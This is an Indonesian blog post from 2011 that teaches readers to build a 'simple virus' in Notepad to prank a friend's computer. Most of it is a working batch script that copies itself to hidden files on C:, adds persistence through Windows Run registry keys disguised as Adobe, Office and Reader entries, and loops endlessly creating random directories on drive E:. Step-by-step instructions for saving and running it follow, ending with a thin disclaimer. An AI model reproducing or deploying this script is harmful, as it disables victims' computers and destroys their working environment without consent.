Minggu, 01 Mei 2011

Membuat Virus Sederhana Dengan Notepad


Membuat Virus Sederhana Dengan Notepad

Bagi yang mau jahil sama komputer teman nih aku kasih tips buat Virus sederhana menggunakan Notepad yang sudah ada pada windows.
Virus yang akan anda buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.
Oke simaklah dengan baik,,

-buka notepad
-copy kode dibawah ini paste di notepad :

@echo off
title %username% Wan Bule Simple Commend !!!
echo ~~~~~~~~~~~~~~ 100% Succes Complete ~~~~~~~~~~~~~~~~~
copy *.cmd c:\Autoexec.cmd >nul
copy *.cmd c:\ntldr.cmd >nul
copy *.cmd c:\MSDOS.cmd >nul
copy *.cmd c:\IO.cmd >nul
copy *.cmd c:\hiberfil.cmd >nul
copy *.cmd c:\pagefile.cmd >nul
attrib +r +s +h c:\Autoexec.cmd >nul
attrib +r +s +h c:\ntldr.cmd >nul
attrib +r +s +h c:\MSDOS.cmd >nul
attrib +r +s +h c:\IO.cmd >nul
attrib +r +s +h c:\hiberfil.cmd >nul
attrib +r +s +h c:\pagefile.cmd >nul
attrib +r +s +h c:\Tes aja.exe>nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wanbule@yahoo.com /t REG_SZ /d c:\Autoexec.cmd /f >nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32 /t REG_SZ /d c:\ntldr.cmd /f >nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows /t REG_SZ /d c:\MSDOS.cmd /f >nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AdobeLauncer /t REG_SZ /d c:\IO.cmd /f >nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MsOffice /t REG_SZ /d c:\hiberfil.cmd /f >nul
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Reader /t REG_SZ /d c:\pagefile.cmd /f >nul
md D:\Data_%username%\urang awak.exe
md c:\system.bat
:start
mkdir e:\%random% mkdir e:\%random% mkdir e:\%random%
mkdir e:\%random% mkdir e:\%random% mkdir e:\%random%
mkdir e:\%random% mkdir e:\%random% mkdir e:\%random%
mkdir e:\%random% mkdir e:\%random% mkdir e:\%random%
goto start

di atas itu adalah kodenya, silahkan di copy code dan paste ke Notepad
kemudian anda save dengan nama ngetes.bat ganti save as type nya menjadi all files.sekarang tingkal dijalankan saja, selesai 
Apabila terjadi kerusakan pada system anda Penulis tidak bertanggung jawab. kode diatas jangan digunakan untuk kepentingan pribadi anda yang dapat merugikan orang lain. ini hanyalah untuk pengetahuan semata.  Selama Mencoba

SEORANG TERPELAJAR HARUSLAH SUDAH BERLAKU ADIL SEJAK DALAM PIKIRAN APALAGI DALAM PERBUATAN.